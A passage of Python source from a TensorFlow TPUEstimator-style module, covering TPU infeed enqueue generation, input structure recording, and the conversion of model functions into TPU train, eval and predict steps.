number_of_tuple_elements=len(per_host_sharded_inputs[0])
)
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl
)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id
):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id
)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
"For mode PREDICT, `input_fn` must return `Dataset` instead of "
"`features` and `labels`."
)
if batch_axis is not None:
raise TypeError("For mode PREDICT, batch_axis is not supported yet.")
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
)
if is_dataset:
hooks.append(inputs.dataset_initializer_hook())
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals
)
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis,
)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl,
)
if signals is None:
return per_host_enqueue_ops
else:
return {"ops": per_host_enqueue_ops, "signals": signals}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id
):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id
)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError(
"`input_fn` must return a `Dataset` for the PER_HOST_V2 "
"input pipeline configuration."
)
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host,
)
hooks.append(inputs.dataset_initializer_hook())
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError("`input_fn` must return a `Dataset` for this mode.")
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping singal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals["stopping"] = cached_signals["stopping"]
else:
cached_signals = signals
inputs_structure_recorder.validate_and_record_structure(
features, labels
)
flattened_inputs = inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals
)
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment,
)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs
)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0])
)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
)
captured_infeed_queue.capture(infeed_queue)
if signals is None:
return per_host_enqueue_ops
else:
return {"ops": per_host_enqueue_ops, "signals": signals}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
def generate_broadcast_enqueue_ops_fn(
ctx, input_fn, inputs_structure_recorder, num_hosts
):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
hooks = []
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0
)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
"For mode PREDICT, `input_fn` must return `Dataset` instead of "
"`features` and `labels`."
)
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
)
if is_dataset:
hooks.append(inputs.dataset_initializer_hook())
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(replica_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
def device_function_impl(replica_id):
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = (
inputs.features_and_labels()
) # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels
)
flattened_inputs = inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals
)
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0])
)
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl,
)
if signals is None:
return enqueue_ops
else:
return {"ops": enqueue_ops, "signals": signals}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). `features` can be `Tensor`, dict of string name to `Tensor`,
or nested tuples and `labels` could be `None`, `Tensor`, or dict of string
name to `Tensor`. TPU infeed/outfeed library expects flattened tensor list.
So, `features` and `labels` need to be flattened, before infeed enqueue, and
the structure of them needs to be recorded, in order to restore them after
infeed dequeue.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, "must have 1 or 2 elements."
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, (
"input_partition_dims[0] must " "not be None"
)
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, "InputsStructureRecorder is not initialized."
return self._flattened_input_dims
def has_labels(self):
return "labels" in self._feature_structure
def _flatten_input_dims(
self,
feature_dims,
feature_dims_names,
label_dims,
label_dims_names,
label_names,
has_labels,
):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names]
)
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names]
)
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
"TPUConfig.input_partition_dims[0] mismatched feature"
" keys. Expected {}, got {}".format(
feature_names, feature_dims_names
)
)
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
"TPUConfig.input_partition_dims[1] mismatched label"
" keys. Expected {}, got {}".format(
label_names, label_dims_names
)
)
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims,
feature_dims_names,
self._label_dims,
label_dims_names,
label_names,
has_labels,
)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure["features"] = features
if labels is not None:
self._feature_structure["labels"] = labels
if signals is not None:
self._feature_structure["signals"] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(
self._feature_structure, flattened_inputs
)
return _Inputs(
unflattened_inputs["features"],
unflattened_inputs.get("labels"),
signals=unflattened_inputs.get("signals"),
)
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims
)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure()
)
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_hooks = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope("input_pipeline_task%d" % (host_id)):
enqueue_ops_fn, captured_infeed_queue = generate_per_core_enqueue_ops_fn_for_host(
self._ctx,
self._input_fn,
self._inputs_structure_recorder,
host_device,
host_id,
)
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn
)
)
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = generate_broadcast_enqueue_ops_fn(
self._ctx, self._input_fn, self._inputs_structure_recorder, num_hosts
)
all_hooks.extend(hooks)
if is_dataset:
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT
else _wrap_computation_in_while_loop_with_stopping_signals
)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope("input_pipeline_task%d" % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx,
self._input_fn,
self._inputs_structure_recorder,
host_device,
host_id,
)
else:
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = generate_per_host_enqueue_ops_fn_for_host(
self._ctx,
self._input_fn,
self._inputs_structure_recorder,
self._batch_axis,
host_device,
host_id,
)
all_hooks.extend(hooks)
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if is_dataset:
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT
else _wrap_computation_in_while_loop_with_stopping_signals
)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn)
)
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = (
"Input pipeline contains one or more QueueRunners. "
"It could be slow and not scalable. Please consider "
"converting your input pipeline to use `tf.data` instead (see "
"https://www.tensorflow.org/guide/datasets for "
"instructions."
)
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, train_cache_fn, eval_cache_fn, config, params, ctx):
self._model_fn = model_fn
self._train_cache_fn = train_cache_fn
self._eval_cache_fn = eval_cache_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss, *cache):
"""Training step function for use inside a while loop."""
if not self._params.get("track_mean", False):
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
# Consume the current cache
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels, cache=cache)
)
# Retrieve the new returned cache
"""
`cache` consists of a list of tensors, potentially empty (of length 0)
"""
cache = estimator_spec.cache
new_loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(
estimator_spec, model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op]):
host_call_outfeed_ops = []
if (
isinstance(
estimator_spec, model_fn_lib._TPUEstimatorSpec
) # pylint: disable=protected-access
and estimator_spec.host_call is not None
):
host_call.record({"host_call": estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
if self._params.get("track_mean", False):
loss = tensorflow.stop_gradient(loss)
return [math_ops.add(loss, new_loss)] + cache
else:
return [array_ops.identity(new_loss)] + cache
return (train_step, host_call, captured_scaffold_fn, captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss, *cache):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
# Consume the current cache
tpu_estimator_spec = self._call_model_fn(features, labels, cache=cache)
if not isinstance(
tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
raise RuntimeError(
"estimator_spec used by TPU evaluation must have type"
"`TPUEstimatorSpec`. Got {}".format(type(tpu_estimator_spec))
)
# Retrieve the new returned cache
cache = tpu_estimator_spec.cache
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record["eval_metrics"] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record["host_call"] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return [math_ops.add(total_loss, loss)] + cache
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, "Internal Error: `signals` is missing."
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False
)
if not isinstance(
tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
raise RuntimeError(
"estimator_spec used by TPU prediction must have type"
"`TPUEstimatorSpec`. Got {}".format(type(tpu_estimator_spec))
)
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record["predictions"] = [identity_fn, tpu_estimator_spec.predictions]
to_record["signals"] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record["host_call"] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn, captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError("TPUEstimatorSpec.predictions must be dict of Tensors.")
for (key, tensor) in predictions.items():
if tensor.shape[0].value is None:
raise ValueError(
"The tensor with key ({}) in TPUEstimatorSpec.predictions has "
"dynamic shape (should be static). Tensor: {}".format(key, tensor)
)
return predictions
def _validate_model_features_and_labels(self, features, labels, is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: Tensor or a dictionary of Tensors
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if not isinstance(obj, ops.Tensor) and not isinstance(obj, dict):
raise TypeError(
"The {} to the model returned by input_fn must be either a Tensor "
"or a dictionary of Tensors. {}: {}".format(obj_name, obj_name, obj)
)
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
"The {} to the model returned by input_fn must have static shape."
" Tensor: {}".format(obj_name, obj)
)
else:
for (key, value) in obj.items():
flattened_tensors = data_nest.flatten(value)
for tensor in flattened_tensors:
if not tensor.get_shape().is_fully_defined():
raise ValueError(
"The {} to the model returned by input_fn must have static "
"shape. Key: '{}', Tensor: {}".format(
obj_name, key, tensor
)
)
validate(features, "features")
if labels is not None:
validate(labels, "labels")
def _call_model_fn(self, features, labels, cache=None, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if "labels" in model_fn_args:
kwargs["labels"] = labels
elif labels is not None:
raise ValueError(
"model_fn does not take labels, but input_fn returns labels."
)
if "mode" in model_fn_args:
kwargs["mode"] = self._ctx.mode
if "config" in model_fn_args:
kwargs["config"] = config
if "params" in model_fn_args:
kwargs["params"] = params
if cache is not None:
params["cache"] = cache
if "params" not in model_fn_args:
raise ValueError(
"model_fn ({}) does not include params argument, "
"required by TPUEstimator to pass batch size as "
"params['batch_size']".format(self._model_fn)
)
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False
)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if running_on_cpu and isinstance(
estimator_spec, model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(
estimator_spec, model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
return estimator_spec
err_msg = "{} returned by EstimatorSpec is not supported in TPUEstimator."
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format("training_chief_hooks")
+ "If you want"
+ " to pass training hooks, please pass via training_hooks."
)
if estimator_spec.scaffold:
logging.warning(
"EstimatorSpec.Scaffold is ignored by TPU train/eval. "
"Please use TPUEstimatorSpec."
)
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError("{} should be tuple or list".format(name))
if len(host_call) != 2:
raise ValueError("{} should have two elements.".format(name))
if not callable(host_call[0]):
raise TypeError("{}[0] should be callable.".format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError("{}[1] should be tuple or list, or dict.".format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
"In TPUEstimatorSpec.{}, length of tensors {} does not match "
"method args of the function, which takes {}.".format(
name, len(host_call[1]), len(fn_args)
)
)
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
"Exception while calling %s: %s. It is likely the tensors "
"(%s[1]) do not match the "
"function's arguments",
name,
e,
name,
)
raise e
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
